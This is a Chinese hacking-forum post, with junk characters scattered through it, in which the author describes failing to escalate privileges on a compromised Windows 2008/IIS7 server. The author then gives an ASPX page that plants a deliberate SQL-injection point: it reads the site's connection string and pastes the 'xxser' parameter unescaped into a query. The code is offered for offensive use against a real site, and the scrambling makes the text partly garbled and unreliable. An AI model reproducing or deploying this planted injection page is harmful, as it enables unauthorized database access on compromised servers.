昨天跟4z1看一个站点,提权很难提,看了整整5个小时,无果。 2008+iis7,无sa,无root,无各种服务。。。
6 K" O4 ~; l. V; r5 T其实中用到了aspx构造注射来跨站,网上找了一堆代码,没一个能用的。
% u2 e% [( d$ @" c" W2 z( l$ f代码量不多,自己写个拉倒了。烦死了。% `5 O5 `+ G5 Q
$ U9 G4 K+ a3 n7 k7 U' U' s: k% B8 w, ?6 P. D0 `8 a
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
/ r! i) J) W# e<html xmlns="http://www.w3.org/1999/xhtml">
. P W4 ?) \! V" _! I; s V<head runat="server"> P; b: \5 P& F. F0 h
<title>暗影aspx构造注射专用页面</title>
2 n1 _8 i: \5 \/ x$ |- M/ {8 R+ _</head>- x' q G4 q) D) I5 k
<body>
% @, E$ v2 ^2 c <form id="form1" runat="server">
; g, u l6 ~! ^; N j( d- q; C <div>$ h( B# Y, F- r
<script language="c#" runat="server">: D% U! S: |* ~3 S+ D
7 u. V% D. Z- s' z
void page_init(object sender, EventArgs e), Z0 v9 y% ^8 {3 l
{
# g- J1 F+ R: R: V5 g) P ' j6 l" f$ Q. O1 A$ w. N* p
System.Data.SqlClient.SqlConnection conn = new System.Data.SqlClient.SqlConnection();
! n2 X4 V H8 Q4 V; P: C . ]* Z) a; F; J
conn.ConnectionString = ConfigurationManager.ConnectionStrings["连接名"].ToString();: ^; t% V: H s
conn.Open();
" o. V. b/ }+ ~7 z* c. a6 r
: g" x8 z2 V& T2 x string i = this.Page.Request.Params["xxser"]; //这里是参数?xxser=18 Y! }9 b( T% n, B0 b! R4 H. \6 f
6 w& _. ~7 B+ w! s5 G& Y
System.Data.SqlClient.SqlCommand command = new System.Data.SqlClient.SqlCommand("select * from [表] where 列名= " + i, conn);9 S) ~- n; F: k7 z- s5 l+ Y" b
int x = command.ExecuteNonQuery();
+ _ A8 x" h g. w5 k/ }% A Response.Write(i+"\n");6 x! O: z' o2 m, S
Response.Write(x);% l9 p* b* E6 c& S, G
conn.Close();
: m6 P6 j' @- B) [2 b% ^ }* e( Z+ N8 p) v3 O( O% h9 O
5 X2 F8 Y' W4 P5 V8 I3 B </script>3 O7 M5 D8 T$ Z4 ]. K3 Y
</div>, C- n5 U3 P/ ?' }/ @% Q
</form>
" J$ `, J3 _# A</body>
# R5 W8 z9 o% i8 X</html>
, w- y5 z; e; D |